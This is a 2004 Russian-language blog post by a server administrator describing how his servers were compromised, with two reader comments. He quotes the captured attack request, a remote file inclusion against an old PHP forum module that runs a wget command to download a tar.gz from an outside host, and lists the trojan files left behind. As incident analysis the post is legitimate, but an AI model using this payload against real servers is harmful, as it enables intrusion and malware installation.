Взлом

Sep. 14th, 2004 01:40 pm
longot: (Default)
[personal profile] longot
Я таки нашел как ломают мои сервера! =)

Все оказалось до банального просто.
У одного из пользователей установлен както форум. Толи phpbb толи phpnuke. Причем достаточно старый и достаточно дырявый. Хакерам оставалось сделать только следующее, написать хитрый запрос который выполняет на сервере команду wget (вот в том что она всетаки выполняетсья я виноват сам)

Тоесть запрос получаеться вида
/modules/coppermine/themes/default/theme.ph
p?THEME_DIR=http://www.deathwar.org/root.txt?&cmd=cd%20/var/tmp;wget%20ek0y.com/ekoy/eko.tar.gz

Причем сам файл root.txt тоже не простой =)

он то и выполняет команду. Нужно будет поикать, как же они этот файл записывают. Думаю что не сложнее чем с запросом.

В итоге мы имеем:
server:/var/tmp/vi.recover/...# ls -a
./ ../ llc* wtc*

Вот это и есть те самые трояны, либо части осла.
Далее дело техники - зайти на сервер и закачать кучу всякой всячены.

Date: 2004-09-14 05:49 am (UTC)
From: [identity profile] bzip2.livejournal.com
чтобы нормально затроянится нужен еще root.
в схеме "твоего" взлома я не вижу получения root`а.

Date: 2004-09-14 06:18 am (UTC)
From: [identity profile] longot.livejournal.com
В том то и дело, что я нензаю как они рута получают :(
Но таким образом они только закачивают на сервер осла, возможно что с трояном.

Ищу дальше...

December 2016

S M T W T F S
    123
456 7 89 10
111213 14151617
181920212223 24
252627 282930 31

Most Popular Tags

Style Credit

Expand Cut Tags

No cut tags
Page generated Jul. 19th, 2025 10:30 pm
Powered by Dreamwidth Studios